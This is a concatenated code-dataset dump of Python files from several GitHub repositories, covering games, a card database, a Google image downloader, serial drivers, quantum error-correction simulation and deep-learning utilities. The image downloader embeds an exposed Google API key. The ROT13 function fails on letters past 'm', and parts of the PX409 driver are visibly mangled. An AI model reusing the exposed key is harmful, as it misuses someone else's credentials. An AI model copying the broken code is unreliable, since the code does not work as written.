int(input('\\nTente adivinhar em qual número estou pensando (de 0 a 5): '))\n\nprint('...')\ntime.sleep(2)\n\nif jog == n:\n print(f'\\033[1;32mParabéns!!! \\nVocê venceu, o número certo era o número \\033[0;34m{n}.')\n\nelse:\n print(f'\\033[1;31mVocê perdeu. \\nO número certo era o número \\033[0;34m{n}.')\n\n'''Terminal colors\nStyle (letter style) Text (text colors) / Back (background colors)\n\n0 - Terminal default White - 30 40\n1 - Bold Red - 31 41\n4 - Underline Green - 32 42\n7 - Swap text and Yellow - 33 43\n background colors Blue - 34 44\n Magenta - 35 45\n Cyan - 36 46\n Gray -37 47'''","repo_name":"gabrielcosmo/cursoemvideo.curso.python3","sub_path":"Mundo1/exe028.py","file_name":"exe028.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23926687608","text":"import json\nimport math\nimport os\nimport time\nfrom . import build\n\nDB_PATH = "data/carddb/db.json"\n\n\ndef isDBStale(db):\n creationTime = db["creation_time"]\n now = math.floor(time.time())\n\n oneWeek = 60*60*24*7\n\n return abs(creationTime - now) > oneWeek\n\n\ndef readDb():\n with open(DB_PATH, "r") as f:\n return json.load(f)\n\n\nclass CardDB:\n def noneCard(self, id=-1, name="None"):\n return {\n "id": id,\n "name": name,\n "date": "0000-01-01",\n "unofficial_versions": [],\n "types": [],\n "alt_names": [],\n }\n\n def getCardById(self, id):\n if id not in self.idMap:\n print("No card for id", id)\n return self.noneCard(id=id), False\n\n return self.idMap[id], True\n\n def getCardByName(self, name):\n key = name.lower()\n\n if key not in self.nameMap:\n print("No card for name", name)\n return self.noneCard(name=name), False\n\n return self.nameMap[key], True\n\n def idToName(self, id):\n card, ok = self.getCardById(id)\n return card["name"], ok\n\n def nameToId(self, name):\n card, ok = self.getCardByName(name)\n return card["id"], ok\n\n def filter(self, filterFunc):\n hits = filter(filterFunc, self.cards)\n return list(hits)\n\n def __init__(self):\n fileExists = os.path.isfile(DB_PATH)\n if not fileExists:\n build.buildDatabase()\n\n db = readDb()\n\n if isDBStale(db):\n build.buildDatabase()\n db = readDb()\n\n cards = db["cards"]\n nameMap = dict()\n idMap = dict()\n\n for card in cards:\n idMap[card["id"]] = card\n\n key = card["name"].lower()\n nameMap[key] = card\n for altname in card["alt_names"]:\n key = altname.lower()\n nameMap[key] = card\n\n self.cards = cards\n self.idMap = idMap\n self.nameMap = nameMap\n\n\nif __name__ == "__main__":\n db = CardDB()\n card = db.getCardByName("Kinetic Soldier")\n print(card)\n card = db.getCardByName("Cipher Soldier")\n print(card)\n","repo_name":"Larikk/ygo-jj-helper","sub_path":"jjpy/carddb/carddb.py","file_name":"carddb.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14128559039","text":"import json\nimport re\nfrom googleapiclient.discovery import build\nimport pprint\nimport glob\nimport urllib.request\n\ndef get_image_uri(keyword,num_images):\n service = build("customsearch","v1",developerKey="AIzaSyDBZGKQSQmesq3MlSMuI-spfjOJaHmCHNM")\n start_index = 1\n uri_list = []\n try:\n for i in range(int(num_images//10)):\n res = service.cse().list(\n q=keyword,\n cx="a7f092859a5b4aaf5",\n num=10,\n searchType="image",\n start=start_index\n ).execute()\n start_index += 
10\n\n for image in res['items']:\n uri_list += [image['link']]\n except Exception as e:\n print(e)\n exit(-1)\n return uri_list\n\ndef get_next_file_name_cnt():\n files = glob.glob(\"./saved_images/*\")\n if len(files) == 0:\n return 1\n return max([int(re.split(\"[/|\\\\\\]\",path)[-1].split(\".\")[0]) for path in files]) +1\n\ndef save_images(uri_list):\n file_name_cnt = get_next_file_name_cnt()\n for uri in uri_list:\n path = f\"./saved_images/{file_name_cnt}.png\"\n try:\n img = urllib.request.urlopen(uri).read()\n with open(path,\"wb\") as f:\n f.write(img)\n file_name_cnt += 1\n except Exception as e:\n print(e)\n\ndef main():\n keyword = \"高校野球 中継\"\n num_images = 20\n \n image_uri_list = get_image_uri(keyword,num_images)\n save_images(image_uri_list)\n\nif __name__ == '__main__':\n main()","repo_name":"pikohan-suzuki/draw-the-strike-zone-rect","sub_path":"save_searched_images.py","file_name":"save_searched_images.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40718388588","text":"from __future__ import annotations\nimport datetime\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import Parsable, ParseNode, SerializationWriter\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .unified_role_management_alert_incident import UnifiedRoleManagementAlertIncident\n\nfrom .unified_role_management_alert_incident import UnifiedRoleManagementAlertIncident\n\n@dataclass\nclass SequentialActivationRenewalsAlertIncident(UnifiedRoleManagementAlertIncident):\n # The OdataType property\n odata_type: Optional[str] = \"#microsoft.graph.sequentialActivationRenewalsAlertIncident\"\n # The length of sequential activation of the same role.\n activation_count: Optional[int] = None\n # Display name of the subject that the incident applies to.\n assignee_display_name: Optional[str] = None\n # The identifier of the subject that the incident applies to.\n assignee_id: Optional[str] = None\n # User principal name of the subject that the incident applies to. 
Applies to user principals.\n assignee_user_principal_name: Optional[str] = None\n # The identifier for the directory role definition that's in scope of this incident.\n role_definition_id: Optional[str] = None\n # The display name for the directory role.\n role_display_name: Optional[str] = None\n # The globally unique identifier for the directory role.\n role_template_id: Optional[str] = None\n # End date time of the sequential activation event.\n sequence_end_date_time: Optional[datetime.datetime] = None\n # Start date time of the sequential activation event.\n sequence_start_date_time: Optional[datetime.datetime] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> SequentialActivationRenewalsAlertIncident:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: SequentialActivationRenewalsAlertIncident\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return SequentialActivationRenewalsAlertIncident()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .unified_role_management_alert_incident import UnifiedRoleManagementAlertIncident\n\n from .unified_role_management_alert_incident import UnifiedRoleManagementAlertIncident\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"activationCount\": lambda n : setattr(self, 'activation_count', n.get_int_value()),\n \"assigneeDisplayName\": lambda n : setattr(self, 'assignee_display_name', n.get_str_value()),\n \"assigneeId\": lambda n : setattr(self, 'assignee_id', n.get_str_value()),\n \"assigneeUserPrincipalName\": lambda n : setattr(self, 'assignee_user_principal_name', n.get_str_value()),\n \"roleDefinitionId\": lambda n : setattr(self, 'role_definition_id', n.get_str_value()),\n \"roleDisplayName\": lambda n : setattr(self, 'role_display_name', n.get_str_value()),\n \"roleTemplateId\": lambda n : setattr(self, 'role_template_id', n.get_str_value()),\n \"sequenceEndDateTime\": lambda n : setattr(self, 'sequence_end_date_time', n.get_datetime_value()),\n \"sequenceStartDateTime\": lambda n : setattr(self, 'sequence_start_date_time', n.get_datetime_value()),\n }\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n super().serialize(writer)\n writer.write_int_value(\"activationCount\", self.activation_count)\n writer.write_str_value(\"assigneeDisplayName\", self.assignee_display_name)\n writer.write_str_value(\"assigneeId\", self.assignee_id)\n writer.write_str_value(\"assigneeUserPrincipalName\", self.assignee_user_principal_name)\n writer.write_str_value(\"roleDefinitionId\", self.role_definition_id)\n writer.write_str_value(\"roleDisplayName\", self.role_display_name)\n writer.write_str_value(\"roleTemplateId\", self.role_template_id)\n writer.write_datetime_value(\"sequenceEndDateTime\", self.sequence_end_date_time)\n writer.write_datetime_value(\"sequenceStartDateTime\", self.sequence_start_date_time)\n 
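# Usage sketch (hypothetical kiota parse_node and writer objects):\n # incident = SequentialActivationRenewalsAlertIncident.create_from_discriminator_value(parse_node)\n # incident.serialize(writer)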
\n\n","repo_name":"microsoftgraph/msgraph-beta-sdk-python","sub_path":"msgraph_beta/generated/models/sequential_activation_renewals_alert_incident.py","file_name":"sequential_activation_renewals_alert_incident.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"37147803719","text":"# ROT13 is a simple letter substitution cipher that replaces a letter with the letter 13 letters after it in the alphabet. ROT13 is an example of the Caesar cipher.\n# Create a function that takes a string and returns the string ciphered with Rot13. \n# If there are numbers or special characters included in the string, they should be returned as they are. \n# Only letters from the latin/english alphabet should be shifted, like in the original Rot13 \"implementation\".\n# Please note that using encode is considered cheating.\n\nimport string\n\ndef rot13(message):\n response = ''\n for letter in message:\n if letter.isalpha():\n if letter.islower():\n index = string.ascii_lowercase.index(letter) + 13\n response += string.ascii_lowercase[index]\n else:\n index = string.ascii_uppercase.index(letter) + 13\n response += string.ascii_uppercase[index] \n else:\n response += letter\n return response\n\nmessage = 'This is a test script.'\n\nprint(rot13(message))","repo_name":"etesor/katas","sub_path":"python/rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3198712380","text":"# PX409-USBH script\r\n# written by Jheng-Han Tsai, March 2019\r\n#####################################################################\r\nimport serial\r\nimport time\r\nimport sys\r\nimport struct\r\nimport numpy as np\r\n\r\nclass PX409():\r\n '''Driver for the PX409 pressure transducer'''\r\n def __init__(self, port):\r\n self.serial = serial.Serial(\r\n port=port,\r\n baudrate=115200,\r\n timeout=1,\r\n parity=serial.PARITY_NONE,\r\n bytesize=serial.EIGHTBITS,\r\n stopbits=serial.STOPBITS_ONE,\r\n )\r\n def __enter__(self):\r\n return self\r\n\r\n def __exit__(self, exc_type, exc_value, traceback):\r\n # The exit code of the sample application.\r\n exitCode = 0\r\n sys.exit(exitCode)\r\n print ('Transducer closed.')\r\n\r\n def write(self, command):\r\n self.serial.write((command + '\\r').encode('ascii'))\r\n time.sleep(0.5)\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n return resp_unicode\r\n\r\n def get_serialNumber(self):\r\n '''Returns the transducer’s serial number.\r\n '''\r\n return self.write('SNR')\r\n \r\n def get_firmware(self):\r\n '''Returns the transducer’s Unit ID, firmware version, range, and\r\n engineering units, all in ASCII.\r\n '''\r\n return self.write('ENQ')\r\n\r\n def set_iirFilter(self, num):\r\n '''Read/Write. Reads or sets the IIR filter period (time constant).\r\n where optional nnn is 0 or 1 (disabled), or between 2 to 255\r\n '''\r\n self.serial.write(('IFILTER '+str(num)+'\\r').encode('ascii'))\r\n time.sleep(0.5)\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n \r\n return resp_unicode\r\n\r\n def set_averageNumber(self, num):\r\n '''Reads or sets the number of data points to be averaged for the\r\n boxcar average filter. Valid values are 0, 2, 4, 8 and 16. 
Note: the output rate is\r\n determined by the RATE command setting divided by this value (excluding 0). AVG x\r\n sets the averaged number. Note: the boxcar changes the rate of the readings returned by\r\n the PC command. This is because the boxcar averages the specified number of readings\r\n given by nn, and outputs one reading for the group.\r\n '''\r\n self.serial.write(('AVG '+str(num)+'\\r').encode('ascii'))\r\n time.sleep(0.5)\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n \r\n return resp_unicode\r\n\r\n def set_rate(self, num):\r\n '''Reads or sets the transducer update rate. Valid Values are 0=5sps,\r\n 1=10sps, 2=20sps, 3=40sps, 4=80sps, 5=160sps, 6=320sps, 7=640sps, 8=1000sps.\r\n '''\r\n self.serial.write(('RATE '+str(num)+'\\r').encode('ascii'))\r\n time.sleep(0.5)\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n \r\n return resp_unicode\r\n\r\n def pickAscii(self):\r\n '''Sends single ASCII reading (decimal point also sent as ASCII). Data is post filter, and\r\n scaled to the native engineering units and type of transducer.\r\n '''\r\n self.serial.write(('P' + '\\r\\n').encode('ascii'))\r\n time.sleep(0.025) #Based on reading rate, the highest transfer rate is about 50 Hz\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n \r\n varList = resp_unicode.split()\r\n var = float(varList[0]) #Unit: hPa(default) \r\n \r\n return var\r\n \r\n\r\n def pickBinary(self):\r\n '''Sends single Binary reading.\r\n '''\r\n self.serial.write(('B' + '\\r\\n').encode('ascii'))\r\n time.sleep(0.025) #Based on reading rate\r\n waiting = self.serial.inWaiting()\r\n packet = self.serial.read(waiting)\r\n print (packet)\r\n print ([hex(x) for x in bytes(packet)])\r\n\r\n bipacket = bytearray(bytes(packet)[2:]) \r\n var, = struct.unpack('= dataLength-1:\r\n break\r\n else:\r\n bb.append(bytes(data)[startidx+j])\r\n if hex(bytes(data)[startidx+j]) == '0xaa': \r\n startidx = startidx+1\r\n else:\r\n startidx = startidx\r\n j += 1\r\n break\r\n \r\n if startidx+j >= dataLength-1:\r\n var = 0\r\n \r\n else:\r\n bipacket = bytearray(bytes(bb)[:]) \r\n var, = struct.unpack(' 0:\n return clip_grad.clip_grad_norm_(params, **grad_clip)\n\n\ndef update_lr(optimizer, lr):\n print('Drop LR to', lr)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\ndef save_model(model, optimizer, epochs, loss_train, loss_cls_train,\n loss_pts_init_train, loss_pts_refine_train, loss_heatmap_train,\n loss_offset_train, loss_sem_train, loss_val, loss_cls_val,\n loss_pts_init_val, loss_pts_refine_val, loss_heatmap_val,\n loss_offset_val, loss_sem_val, opts):\n model_name = \"CenterNet_pp_{}_{}.pth\".format(opts[\"backbone\"], epochs)\n torch.save(\n {\n 'epoch': epochs,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'train_loss_history': loss_train,\n 'train_loss_history_cls': loss_cls_train,\n 'train_loss_history_pts_init': loss_pts_init_train,\n 'train_loss_history_pts_refine': loss_pts_refine_train,\n 'train_loss_history_heatmap': loss_heatmap_train,\n 'train_loss_history_offset': loss_offset_train,\n 'train_loss_history_sem': loss_sem_train,\n 'val_loss_history': loss_val,\n 'val_loss_history_cls': loss_cls_val,\n 'val_loss_history_pts_init': loss_pts_init_val,\n 'val_loss_history_pts_refine': loss_pts_refine_val,\n 'val_loss_history_heatmap': 
loss_heatmap_val,\n 'val_loss_history_offset': loss_offset_val,\n 'val_loss_history_sem': loss_sem_val\n }, model_name)\n","repo_name":"qwertyman30/CenterNet-keypoint-triplets","sub_path":"model/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21480178400","text":"import numpy as np\nimport random\nfrom tabulate import tabulate\nimport matplotlib.pyplot as plt\n\ndef sigmaz():\n return np.array([[1,0], [0, -1]])\n\ndef sigmax():\n return np.array([[0,1], [1,0]])\n\ndef sigmay():\n return np.array([[0,-1], [1,0]])\n\n#conjugate transpose\ndef ct(matrix):\n return matrix.conj().T\n\n\ndef next(previous, gate):\n return gate@previous@ct(gate)\n\n#tensor\ndef tensor(ops):\n answer = ops[0]\n for op in ops[1:]:\n answer = np.kron(answer, op)\n return answer\n\n\n\n\nzero = np.array([[1], [0]])\none = np.array([[0], [1]])\n\ndef cnot(control, target, n):\n for i in range(n):\n if i == control:\n sub_g = zero@ct(zero)\n sub_e = one@ct(one)\n elif i == target:\n sub_g = np.eye(2)\n sub_e = sigmax()\n else:\n sub_g = np.eye(2)\n sub_e = np.eye(2)\n g_term = sub_g if i == 0 else np.kron(g_term, sub_g)\n e_term = sub_e if i == 0 else np.kron(e_term,sub_e)\n \n return g_term + e_term\n \n\n#applies cnot \ndef apply_cnot(string, control, target):\n if control == target:\n return string\n newstring = ''\n if string[control] == '1':\n if string[target] == '1':\n newstring = string[:target]+'0'+string[target+1:]\n else:\n newstring= string[:target]+'1'+string[target+1:]\n else:\n newstring = string\n return newstring\n\ndef apply_x(string, target):\n if string[target] == '1':\n string = string[:target] + '0' + string[target+1:]\n elif string[target] == '0':\n string = string[:target] + '1' + string[target+1:]\n return string\n \n\n\ndef returnarray(list):\n newlist = []\n for l in list:\n if l[0] == \"0\":\n final = zero\n else:\n final = one\n for x in range(len(l) -1):\n if l[x+1] == \"0\":\n final = np.kron(final, zero)\n else:\n final = np.kron(final, one)\n newlist.append(final)\n return newlist\n\n\n\n#random circuit\n\ndef gen_random_encoding(n,num_gates):\n number = num_gates\n finallist =[]\n while number > 0:\n if random.randrange(0, 2, 1) == 0:\n finallist.append(('X', (random.randrange(0,n,1),)))\n else:\n first = random.randrange(0, n, 1)\n second = random.randrange(0, n, 1)\n while first == second:\n second = random.randrange(0, n, 1)\n finallist.append(('CX',(first,second)))\n number -= 1\n return finallist\n \ndef evolve_stabilizers(stabilizers, gates, logicals):\n stabilizerlist = []\n logicallist = []\n for stabilizer in stabilizers:\n for gate in gates:\n stabilizer = evolve(stabilizer, gate)\n stabilizerlist.append(stabilizer)\n for logical in logicals:\n for gate in gates:\n logical = evolve(logical, gate)\n logicallist.append(logical)\n return (stabilizerlist,logicallist)\n\n\n\ndef evolve_operators(operators, gates):\n operatorlist = []\n for operator in operators:\n for gate in gates:\n operator = evolve(operator, gate)\n operatorlist.append(operator)\n return operatorlist\n\n\n\ndef evolve(input, gate):\n if gate[0] == 'CX':\n if input[gate[1][0]] == 'I' and input[gate[1][1]] == 'I':\n #II --> II\n return input\n \n elif input[gate[1][0]] == 'Z' and input[gate[1][1]] == 'I':\n #ZI --> ZI\n return input\n \n elif input[gate[1][0]] == 'I' and input[gate[1][1]] == 'Z':\n #IZ --> ZZ\n input = replace_char(input, gate[1][0], 'Z')\n return input\n 
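The cnot builder and the symbolic evolve rules in the stabilizer code above both encode how CX acts by conjugation on Pauli operators. A short numpy check that the projector construction |0><0| (x) I + |1><1| (x) X really reproduces those update rules (self-contained; only numpy is assumed):

import numpy as np

zero = np.array([[1], [0]]); one = np.array([[0], [1]])
X = np.array([[0, 1], [1, 0]]); Z = np.array([[1, 0], [0, -1]]); I = np.eye(2)

# CX = |0><0| (x) I + |1><1| (x) X: flip the target only when the control is |1>.
CX = np.kron(zero @ zero.T, I) + np.kron(one @ one.T, X)

assert np.array_equal(CX @ np.kron(one, zero), np.kron(one, one))   # |10> -> |11>
# Conjugation rules tracked symbolically by evolve() (CX is its own inverse):
assert np.array_equal(CX @ np.kron(X, I) @ CX, np.kron(X, X))       # XI -> XX
assert np.array_equal(CX @ np.kron(I, Z) @ CX, np.kron(Z, Z))       # IZ -> ZZ
assert np.array_equal(CX @ np.kron(Z, I) @ CX, np.kron(Z, I))       # ZI -> ZI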
\n elif input[gate[1][0]] == 'Z' and input[gate[1][1]] == 'Z':\n #ZZ-->IZ\n input = replace_char(input, gate[1][0], 'I')\n return input\n elif input[gate[1][0]] == 'X' and input[gate[1][1]] == 'I':\n #XI --> XX\n input = replace_char(input, gate[1][1], 'X')\n return input\n elif input[gate[1][0]] == 'I' and input[gate[1][1]] == 'X':\n #IX --> IX\n return input\n elif input[gate[1][0]] == 'X' and input[gate[1][1]] == 'X':\n #XX --> XI\n input = replace_char(input, gate[1][1], 'I')\n return input\n elif input[gate[1][0]] == 'X' and input[gate[1][1]] == 'Z':\n raise NotImplementedError(\"action of CX on XZ is not implemented\")\n elif input[gate[1][0]] == 'Z' and input[gate[1][1]] == 'X':\n raise NotImplementedError(\"action of CX on ZX is not implemented\")\n \n elif gate[0] == 'X':\n if input[gate[1][0]] == 'I':\n return input\n elif input[gate[1][0]] == 'Z':\n return input[:-1] + flip_sign(input[-1])\n elif input[gate[1][0]] == 'X':\n return input\n print(\"hi\")\n \n\ndef flip_sign(stab_sign):\n if stab_sign == '+':\n return '-' \n elif stab_sign == '-':\n return '+'\n else:\n raise ValueError(\"sign must be + or -\") \n\n\n\ndef replace_char(stab, i, new_char):\n return stab[:i] + new_char +stab[i+1:]\n\n\n\n\ndef construct_error(p,n):\n error = np.eye(2)\n for i in range(n):\n if random.randrange(1,100)/100 < p:\n if i == 0:\n error *= sigmax()\n else:\n error = tensor([error,sigmax()])\n else:\n if i != 0:\n error = tensor([error,np.eye(2)])\n return error\n\n\n#decoding.ipynb\ndef construct_list_errors(n, m):\n finallist = []\n\n for i in range(n):\n if len(finallist) == 0:\n finallist.append('I')\n finallist.append('X')\n \n else:\n for j in range(len(finallist)):\n if number_of_errors(finallist[j]) highestprob:\n highestprob = rlist[r]\n highestr = r\n table.update({e:highestr})\n return table\n\ndef print_table(table):\n result = table.items()\n data = list(result)\n numpyArray = np.array(data)\n head = ['Error', 'Recovery']\n print(tabulate(numpyArray, headers=head, tablefmt=\"grid\"))\n\n\n\n#random code simulation\ndef find_codewords(initial,gates):\n result=[]\n for state in initial:\n for x in gates:\n if x[0] == 'X':\n state = apply_x(state,x[1][0])\n elif x[0] == 'CX':\n state = apply_cnot(state,x[1][0], x[1][1])\n result.append(state)\n return result \n\n\ndef measure_stabilizers(stabilizers, codeword):\n results = []\n for stab in stabilizers:\n result = 1\n for i in range(len(stab)-1):\n if stab[i] == 'Z' and codeword[i] == '1':\n result *= -1 \n results.append(result)\n \n return results\n \n\n \ndef single_recovery_probability(recov_op, p):\n recoverydict = {}\n x = 0\n i = 0\n for r in recov_op:\n if r == 'X':\n x+=1\n elif r == 'I':\n i+=1\n prob = ((1-p)**i)*((p)**(x))\n\n return prob\n\n\ndef single_recovery_probability_func(recov_op):\n recoverydict = {}\n x = 0\n i = 0\n for r in recov_op:\n if r == 'X':\n x+=1\n elif r == 'I':\n i+=1\n prob = lambda p: ((1-p)**i)*((p)**(x))\n\n return prob\n\ndef get_initial(n):\n initial_states = ['0', '1']\n initial_logs = ['X', 'Z']\n initial_stabs = []\n for i in range(n-1):\n for j in range(len(initial_logs)):\n initial_logs[j] += 'I'\n for j in range(len(initial_states)):\n initial_states[j] += '0'\n initial_stabs.append('I'*n)\n for j in range(len(initial_logs)):\n initial_logs[j] += '+'\n count = 1\n for j in range(len(initial_stabs)):\n initial_stabs[j]= initial_stabs[j][:count] + 'Z' + initial_stabs[j][count+1:] + \"+\"\n count+=1\n return initial_states, initial_logs, initial_stabs\n\n\ndef 
get_error_table_values(error_table, p):\n error_table_values = []\n for error_row in error_table:\n error_table_values.append((error_row[0], error_row[1](p), error_row[2]))\n return error_table_values\n\ndef get_error_table(gates, n=3):\n # initial = ['000', '100']\n # log = ['XII+', 'ZII+']\n # stabs = ['IZI+', 'IIZ+']\n initial_states,initial_log, initial_stabs = get_initial(n)\n codewords = find_codewords(initial_states, gates)\n newlogs = evolve_operators(initial_log, gates)\n newstabilizers = evolve_operators(initial_stabs, gates)\n\n errors = construct_list_errors(n,n)\n error_table = []\n for error in errors:\n errorstate = apply_error(codewords[0], error)\n result = measure_stabilizers(newstabilizers, errorstate)\n prob = single_recovery_probability_func(error)\n error_table.append([error, prob, result])\n return error_table\n\ndef get_logical_error_probs(physical_error_probs, error_table):\n logical_error_probs = []\n for p in physical_error_probs:\n error_table_values = get_error_table_values(error_table, p)\n stabs_to_error_probs = {}\n for error_row_values in error_table_values:\n error_code = error_row_values[0]\n error_prob = error_row_values[1]\n error_stabs = tuple(error_row_values[2])\n if error_stabs not in stabs_to_error_probs:\n stabs_to_error_probs[error_stabs] = []\n\n stabs_to_error_probs[error_stabs].append(error_prob)\n logical_error_prob_value = 0\n for error_stabs in stabs_to_error_probs:\n logical_error_prob_value += sum(stabs_to_error_probs[error_stabs]) - max(stabs_to_error_probs[error_stabs])\n logical_error_probs.append(logical_error_prob_value)\n\n logical_error_probs = np.array(logical_error_probs)\n return logical_error_probs\n\ndef get_logical_error_probs_static(physical_error_probs, error_table, p_static=0.01):\n\n # calculating logical error lambda function\n error_table_values_static = get_error_table_values(error_table, p_static)\n stabs_to_error_probs = {}\n stabs_to_error_prob_functions = {}\n for j in range(len(error_table_values_static)):\n error_row_values = error_table_values_static[j]\n error_code = error_row_values[0]\n error_prob = error_row_values[1]\n error_stabs = tuple(error_row_values[2])\n error_prob_function = error_table[j][1]\n\n if error_stabs not in stabs_to_error_probs:\n stabs_to_error_probs[error_stabs] = []\n stabs_to_error_prob_functions[error_stabs] = []\n\n stabs_to_error_probs[error_stabs].append(error_prob)\n stabs_to_error_prob_functions[error_stabs].append(error_prob_function)\n \n highest_prob_function_list = []\n for error_stabs, error_probs in stabs_to_error_probs.items():\n most_probable_index = np.argmax(np.array(error_probs)) # returns index of highest probability\n highest_prob_function_list.append(stabs_to_error_prob_functions[error_stabs][most_probable_index])\n \n\n def get_logical_error_prob(p):\n prob_correct_error = 0\n for error_prob_function in highest_prob_function_list:\n prob_correct_error+=error_prob_function(p) # adding up probabilities of all errors that are correct\n logical_error_prob = 1 - prob_correct_error\n return logical_error_prob\n\n logical_error_probs = []\n for p in physical_error_probs:\n logical_error_probs.append(get_logical_error_prob(p))\n \n logical_error_probs = np.array(logical_error_probs)\n return logical_error_probs\n\ndef run_code_analysis(codes, static=False, p_static = 0.01):\n for code_name, code_info in codes.items():\n code_info[\"error_table\"] = get_error_table(code_info[\"gates\"], n=code_info[\"n\"])\n code_info[\"physical_error_probs\"] = np.linspace(0,1,101)\n if 
static:\n code_info[\"logical_error_probs\"] = get_logical_error_probs_static(code_info[\"physical_error_probs\"], code_info[\"error_table\"], p_static=p_static)\n else:\n code_info[\"logical_error_probs\"] = get_logical_error_probs(code_info[\"physical_error_probs\"], code_info[\"error_table\"])\n\ndef plot_analysis(codes):\n fig,ax = plt.subplots(1,1,dpi=200,figsize = (4,3))\n for code_name, code_info in codes.items():\n ax.plot(code_info[\"physical_error_probs\"],code_info[\"logical_error_probs\"], label=code_name )\n ax.legend(fontsize=6)\n ax.set_xlabel(\"Physical Error Rate (p)\")\n ax.set_ylabel(\"Logical Error Rate\")\n plt.plot()\n\ndef repetition_code_gates(d):\n gates = []\n for i in range(d-1):\n gates.append(('CX',(0,i+1)))\n return gates\n","repo_name":"snow-apple/random-qec","sub_path":"stabilizer.py","file_name":"stabilizer.py","file_ext":"py","file_size_in_byte":15661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42874966909","text":"# SUJET 13\n\n# Exo 1 :\ndef recherche(a, tab):\n occur = 0\n for element in tab :\n if a == element :\n occur += 1\n return occur\n\n# Appels de vérification :\nprint(recherche(5, []))\nprint(recherche(5, [-2, 3, 4, 8]))\nprint(recherche(5, [-2, 3, 1, 5, 3, 7, 4]))\nprint(recherche(5, [-2, 5, 3, 5, 4, 5]))\n\n# Exo 2 :\ndef rendu_monnaie(somme_due, somme_versee):\n pieces = [1, 2, 5, 10, 20, 50, 100, 200]\n rendu = []\n a_rendre = somme_versee - somme_due\n i = len(pieces) - 1\n while a_rendre > 0 :\n if pieces[i] <= a_rendre :\n rendu.append(pieces[i])\n a_rendre = a_rendre - pieces[i]\n else :\n i = i - 1\n return rendu\n\n# Appels de vérification :\nprint(rendu_monnaie(700,700))\nprint(rendu_monnaie(102,500))","repo_name":"4strium/Exos-BAC-NSI-2023","sub_path":"SUJET_13/SUJET_13_CORRECTION.py","file_name":"SUJET_13_CORRECTION.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37002105171","text":"from collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.model_zoo as model_zoo\nfrom torch.utils.data import TensorDataset, DataLoader, SequentialSampler\nfrom torch.utils.data.distributed import DistributedSampler\n\nfrom .darknet import *\nfrom .convlstm import *\nfrom .modulation import *\n\nimport argparse\nimport collections\nimport logging\nimport json\nimport re\nimport time\nfrom tqdm import tqdm\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom pytorch_pretrained_bert.modeling import BertModel\n\n\ndef st_grid_calculation(st_relevance_score, word_id_st_sent2wordlist, bbox_st_list, word_id_st_sent, st_list_bbox2word, visu_scale, image_scale):\n batch_size = st_relevance_score.shape[0]\n dividend = image_scale // visu_scale\n activation_map = torch.zeros(batch_size, visu_scale, visu_scale, 1).cuda()\n for batch_i in range(batch_size):\n for ii in range(len(st_relevance_score[batch_i])):\n if not st_relevance_score[batch_i][ii] == 0:\n bbox_index = torch.nonzero(st_list_bbox2word[batch_i]==(word_id_st_sent2wordlist[batch_i][ii]+1))\n for jj in bbox_index:\n x1, y1, x2, y2 = bbox_st_list[batch_i][jj.item()]\n grid_xl = (x1 // dividend).int().item()\n grid_xr = min((x2 // dividend + 1).int().item(), visu_scale - 1)\n grid_yt = (y1 // dividend).int().item()\n grid_yb = min((y2 // dividend + 1).int().item(), visu_scale - 1)\n activation_map[batch_i, grid_yt:grid_yb, grid_xl:grid_xr] = 
